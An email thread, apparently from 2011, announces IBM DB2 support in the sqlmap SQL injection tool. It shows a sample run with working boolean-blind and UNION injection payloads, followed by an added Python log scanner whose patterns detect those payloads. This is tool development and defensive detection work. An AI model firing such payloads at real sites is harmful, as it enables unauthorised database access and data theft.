Hi,

Update on IBM DB2 support: payload for time-based has been added[1] last week as well as support for direct connection (-d switch).

[1] https://twitter.com/#!/sqlmap/status/85659702565937152

On 25 June 2011 11:04, Bernardo Damele A. G. <bernardo.dam...@gmail.com> wrote:
> Hi,
>
> The long-awaited IBM DB2 support has been implemented in sqlmap. The patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH and merged into the sqlmap repository after some tweaking by us. It is very stable for both DB2 8.x and 9.x branches.
> The patch includes support to fingerprint and enumerate data on IBM DB2 via boolean-based blind SQL injection and UNION query SQL injection. Hopefully, soon someone will come up with a payload for time-based and error-based techniques too. Support for direct connection to the DBMS (-d switch) will be implemented soon as well.
>
> Thank you Sebastian and the rest of the team at r-tec for your patch and support!
>
> Sample run against an IBM DB2 9.7 test environment:
> --8<--
> $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>
>     sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 10:56:21
>
> [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
> [10:56:21] [INFO] testing connection to the target url
> [10:56:23] [INFO] heuristics detected web page charset 'ascii'
> [10:56:23] [INFO] testing if the url is stable, wait a few seconds
> [10:56:25] [INFO] url is stable
> [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
> [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
> [10:56:26] [INFO] GET parameter 'id' is dynamic
> [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
> [10:56:27] [INFO] testing sql injection on GET parameter 'id'
> [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
> [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
> [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
> GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
> sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 1 to 10 columns
>     Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
> ---
>
> [10:58:58] [INFO] testing IBM DB2
> [10:58:59] [INFO] confirming IBM DB2
> [10:59:12] [INFO] the back-end DBMS is IBM DB2
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: active fingerprint: IBM DB2 9.7
>                html error message fingerprint: DB2
> [10:59:12] [INFO] fetching banner
> banner: 'DB2 v9.7.400.501'
>
> [10:59:13] [INFO] fetching current user
> current user: 'TEST'
> --8<--
>
> Bernardo
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
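As an added example (not code from the thread or from sqlmap itself), a small Python scanner from the defender's side: it URL-decodes the query strings in web access-log lines and flags the DB2-specific indicators visible in the two payloads of the sample run above (the SYSIBM.SYSDUMMY1 dummy table, the CHR()||CHR() string building, the n=n and 'x'='x tautologies), and it decodes the CHR() chain back into the delimiter string that sqlmap builds around the value it extracts. The log lines are constructed, not taken from the original run.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not from the original thread);
# the two injected query strings are the payloads sqlmap reported above.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jun/2011:10:56:32 +0100] "GET /page.php?id=1%27%20AND%20'
    '7118%3D7118%20AND%20%27Skhh%27%3D%27Skhh HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Jun/2011:10:56:51 +0100] "GET /page.php?id=1%27%20UNION%20'
    'ALL%20SELECT%20CHR(58)%7C%7CCHR(110)%7C%7CCHR(114)%7C%7CCHR(114)%7C%7CCHR(58)'
    '%7C%7CCHR(90)%7C%7CCHR(103)%7C%7CCHR(65)%7C%7CCHR(88)%7C%7CCHR(66)%7C%7CCHR(109)'
    '%7C%7CCHR(69)%7C%7CCHR(74)%7C%7CCHR(77)%7C%7CCHR(117)%7C%7CCHR(58)%7C%7CCHR(101)'
    '%7C%7CCHR(113)%7C%7CCHR(108)%7C%7CCHR(58)%20FROM%20SYSIBM.SYSDUMMY1--%20AND%20'
    '%27QrLM%27%3D%27QrLM HTTP/1.1" 200 640',
    '10.0.0.7 - - [25/Jun/2011:11:02:03 +0100] "GET /page.php?id=42 HTTP/1.1" 200 480',
]

REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)')
CHR_ARG = re.compile(r"CHR\((\d+)\)", re.I)
# Indicators taken from the two DB2 payloads in the sample run: the UNION
# probe, its DB2-only dummy table, the CHR()||CHR() string building that
# avoids quotes, and the n=n / 'x'='x tautologies of the boolean-blind test.
INDICATORS = {
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "db2-dummy-table": re.compile(r"\bSYSIBM\.SYSDUMMY1\b", re.I),
    "chr-concat-chain": re.compile(r"(?:CHR\(\d+\)\|\|){2,}CHR\(\d+\)", re.I),
    "numeric-tautology": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "string-tautology": re.compile(r"\bAND\s+'(\w+)'='\1\b", re.I),
}

def decode_chr_chain(chain):
    # Rebuild the literal that CHR(58)||CHR(110)||... concatenates.
    return "".join(chr(int(n)) for n in CHR_ARG.findall(chain))

def scan_log(lines):
    # Return one record per log line whose query string matches an indicator.
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        query = unquote(m.group(1).split("?", 1)[1])  # decode %27, %7C, ...
        found = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if not found:
            continue
        chain = INDICATORS["chr-concat-chain"].search(query)
        hits.append({"line": lineno, "indicators": found,
                     "decoded": decode_chr_chain(chain.group(0)) if chain else None})
    return hits
```

Run over SAMPLE_LOG, the first line is flagged by both tautology patterns alone, while the UNION line is flagged by all of union-select, db2-dummy-table, chr-concat-chain and string-tautology, with the CHR() chain decoding to ':nrr:ZgAXBmEJMu:eql:'.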